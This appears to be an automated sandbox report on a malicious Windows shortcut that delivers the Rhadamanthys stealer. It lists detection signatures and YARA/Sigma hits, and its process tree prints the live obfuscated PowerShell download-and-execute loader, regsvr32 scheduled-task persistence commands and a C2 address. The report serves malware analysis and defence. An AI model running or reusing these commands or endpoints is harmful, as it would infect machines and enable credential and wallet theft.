Edit tour

Windows Analysis Report
fBcMVl6ns6.lnk

Overview

General Information

Sample name:	fBcMVl6ns6.lnk renamed because original name is a hash value
Original sample name:	5089ec3c865e6c490ee27dff0b7dbe81ff882fbbeebf280c213ed9914ade6848.lnk
Analysis ID:	1529310
MD5:	ae44dfe179f7ab8400c90b2d208ff313
SHA1:	7f87bfe1edeccd7a01ff20519e92ba54e7d8e4a8
SHA256:	5089ec3c865e6c490ee27dff0b7dbe81ff882fbbeebf280c213ed9914ade6848
Tags:	lnkrocketdocs-loluser-JAMESWT_MHT
Infos:

Detection

RHADAMANTHYS

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Powershell launch regsvr32

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Windows shortcut file (LNK) starts blacklisted processes

Yara detected Powershell download and execute

Yara detected RHADAMANTHYS Stealer

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Drops PE files to the user root directory

Found direct / indirect Syscall (likely to bypass EDR)

Found many strings related to Crypto-Wallets (likely being stolen)

Loading BitLocker PowerShell Module

Machine Learning detection for sample

Obfuscated command line found

Powershell creates an autostart link

Powershell drops PE file

Sets debug register (to hijack the execution of another thread)

Sigma detected: Execution from Suspicious Folder

Sigma detected: Outbound RDP Connections Over Non-Standard Tools

Sigma detected: Parent in Public Folder Suspicious Process

Sigma detected: Potentially Suspicious Malware Callback Communication

Sigma detected: Powerup Write Hijack DLL

Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder

Suspicious powershell command line found

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Connects to several IPs in different countries

Contains functionality to call native functions

Contains functionality to communicate with device drivers

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected non-DNS traffic on DNS port

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the user directory

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Installs a raw input device (often for capturing keystrokes)

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Dllhost Internet Connection

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Network Connection Initiated By Regsvr32.EXE

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Potential Regsvr32 Commandline Flag Anomaly

Suricata IDS alerts with low severity for network traffic

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Keylogger Generic

Classification

Process Tree

System is w10x64

cmd.exe (PID: 1992 cmdline: "C:\Windows\system32\cmd.exe" /c p""ow""er""s""h""ell/""W 0""1 $jufn='i'+'e'+''+'X';s""al bx1g $jufn;$ajbs50ul=bx1g(bx1g($($('(new-objecwxwl syswxwlem.newxwl.webc""lienwxwl).Dowgdvitring(''hv7i91h982d.bp24mostakp24.spacp24/tp24st.txt''.Replace(''v7i9'',''ttps://'').Replace(''p24'', ''e''))').Replace('wxwl', 't').Replace('gdvi', 'nloadS'))));exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5560 cmdline: p""ow""er""s""h""ell /""W 0""1 $jufn='i'+'e'+''+'X';s""al bx1g $jufn;$ajbs50ul=bx1g(bx1g($($('(new-objecwxwl syswxwlem.newxwl.webc""lienwxwl).Dowgdvitring(''hv7i91h982d.bp24mostakp24.spacp24/tp24st.txt''.Replace(''v7i9'',''ttps://'').Replace(''p24'', ''e''))').Replace('wxwl', 't').Replace('gdvi', 'nloadS'))));exit MD5: 04029E121A0CFA5991749937DD22A1D9)

ajbs50ul.bat (PID: 5344 cmdline: "C:\Users\Public\ajbs50ul.bat" MD5: 8837DF25AABC4FAD85E851ACA192F714)

powershell.exe (PID: 7104 cmdline: "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/M08e.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{4C8CCCCC-0448-48C8-C088-8CCCC0000044}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 3576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

regsvr32.exe (PID: 3360 cmdline: "regsvr32" /s /i:INSTALL C:\Users\user\AppData/Roaming/M08e.ini MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)

utox_x86_x64.exe (PID: 6004 cmdline: "C:\Users\user\Desktop\utox_x86_x64.exe" MD5: E9679980AA73CFC7CF00F3DA7949C661)

regsvr32.exe (PID: 2976 cmdline: C:\Windows\system32\regsvr32.EXE /s /i:INSTALL C:\Users\user\AppData/Roaming/M08e.ini MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)

OpenWith.exe (PID: 5208 cmdline: "C:\Windows\system32\openwith.exe" MD5: E4A834784FA08C17D47A1E72429C5109)

rekeywiz.exe (PID: 5860 cmdline: "C:\Windows\system32\rekeywiz.exe" MD5: A24EFFD38DDC2FFAB4F0592CA2CC585E)

powershell.exe (PID: 2952 cmdline: "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/Gga6.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{4C0C80C0-8884-4C8C-CCC0-CC80C840C404}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 4152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

regsvr32.exe (PID: 3340 cmdline: "regsvr32" /s /i:INSTALL C:\Users\user\AppData/Roaming/Gga6.ini MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)

wmprph.exe (PID: 3276 cmdline: "C:\Program Files\Windows Media Player\wmprph.exe" MD5: B4298167D12E6AC4618518E0B6326802)

dllhost.exe (PID: 4676 cmdline: "C:\Windows\system32\dllhost.exe" MD5: 08EB78E5BE019DF044C26B14703BD1FA)

rekeywiz.exe (PID: 5072 cmdline: "C:\Windows\system32\rekeywiz.exe" MD5: A24EFFD38DDC2FFAB4F0592CA2CC585E)

regsvr32.exe (PID: 5436 cmdline: C:\Windows\system32\regsvr32.EXE /s /i:INSTALL C:\Users\user\AppData/Roaming/Gga6.ini MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Rhadamanthys	According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.	Sandworm	https://0xmrmagnezi.github.io/malware%20analysis/Rhadamanthys/ https://blog.cyble.com/2023/01/12/rhadamanthys-new-stealer-spreading-through-google-ads/ https://blog.google/threat-analysis-group/ukraine-remains-russias-biggest-cyber-focus-in-2023 https://elis531989.medium.com/dancing-with-shellcodes-analyzing-rhadamanthys-stealer-3c4986966a88 https://github.com/echocti/ECHO-Reports/blob/main/Malware%20Analysis%20Report/Rhdamanthys/Rhadamanthys-EN.pdf	https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

Malware Configuration

Threatname: Rhadamanthys

{"C2 url": "https://147.45.126.71:3752/20846e26ac9fe96c52/8ackhmnt.9e5wm"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
0000000E.00000003.1733264637.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1772221691.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1770896929.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1776058273.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1774245020.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1772517480.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000009.00000002.1661729076.000000001BA01000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1751813778.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1744735797.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1741663241.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1752960096.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1764199832.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1773158578.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1758049624.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1767980994.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1739181531.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1745060493.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1765364016.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1774030054.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1730971445.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1759435128.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1749345129.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1744476159.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1743945250.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1748274287.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1627889710.000001F9DF920000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1770471428.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1737974066.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1733891571.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1775675719.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1758603457.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1738781521.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1750663652.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1766830436.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1737361189.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1746053538.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1735264963.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1771728010.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1764871739.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1732324317.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000009.00000003.1602767929.00000000028D0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1752123123.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1739761324.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1738314505.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1749877777.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1634556550.000001F9E0470000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0000000E.00000003.1754168196.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1636300558.000001F9E0750000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0000000E.00000003.1726579095.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1734444495.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1752709890.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1753586274.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1748873710.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1742093895.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1763763009.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1745501240.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1755359019.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1774918323.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1736566513.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1748590947.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1756177662.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1757743595.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1773734067.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1735678354.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000009.00000003.1626522030.000000001C2E0000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0000000E.00000003.1740296656.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1756708487.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1752460608.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1744204587.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1731959678.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1740765343.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1726579095.000001F9E0C91000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1736978478.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000009.00000003.1625000511.000000001C000000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0000000E.00000003.1750934596.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1731676215.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1751248603.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1753303535.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1766516787.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1767428012.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1755616290.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1731420429.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1765992633.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1750138359.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1754962335.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1742638722.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1747838363.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1742967878.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1736196050.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1754590766.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1751538386.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1774468300.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1757113350.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1761379644.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.1743292419.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
Process Memory Space: powershell.exe PID: 5560	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: regsvr32.exe PID: 2976	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: OpenWith.exe PID: 5208	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Click to see the 93 entries

Unpacked PEs

Source	Rule	Description	Author
14.3.OpenWith.exe.1f9e0750000.5.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
14.3.OpenWith.exe.1f9e0470000.4.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
14.3.OpenWith.exe.1f9e0470000.4.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
9.3.regsvr32.exe.1c000000.4.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
9.3.regsvr32.exe.1c2e0000.5.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
14.3.OpenWith.exe.1f9e0750000.5.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
9.3.regsvr32.exe.1c000000.4.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
9.3.regsvr32.exe.1c2e0000.5.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Click to see the 3 entries

Other

Source	Rule	Description	Author	Strings
amsi64_5560.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Sigma Signatures

System Summary

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\ajbs50ul.bat" , CommandLine: "C:\Users\Public\ajbs50ul.bat" , CommandLine|base64offset|contains: , Image: C:\Users\Public\ajbs50ul.bat, NewProcessName: C:\Users\Public\ajbs50ul.bat, OriginalFileName: C:\Users\Public\ajbs50ul.bat, ParentCommandLine: p""ow""er""s""h""ell /""W 0""1 $jufn='i'+'e'+''+'X';s""al bx1g $jufn;$ajbs50ul=bx1g(bx1g($($('(new-objecwxwl syswxwlem.newxwl.webc""lienwxwl).Dowgdvitring(''hv7i91h982d.bp24mostakp24.spacp24/tp24st.txt''.Replace(''v7i9'',''ttps://'').Replace(''p24'', ''e''))').Replace('wxwl', 't').Replace('gdvi', 'nloadS'))));exit, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5560, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\Public\ajbs50ul.bat" , ProcessId: 5344, ProcessName: ajbs50ul.bat

Sigma detected: Outbound RDP Connections Over Non-Standard Tools

Source: Network Connection

Author: Markus Neis: Data: DestinationIp: 104.223.122.15, DestinationIsIpv6: false, DestinationPort: 3389, EventID: 3, Image: C:\Users\user\Desktop\utox_x86_x64.exe, Initiated: true, ProcessId: 6004, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 55212

Sigma detected: Parent in Public Folder Suspicious Process

Source: Process started

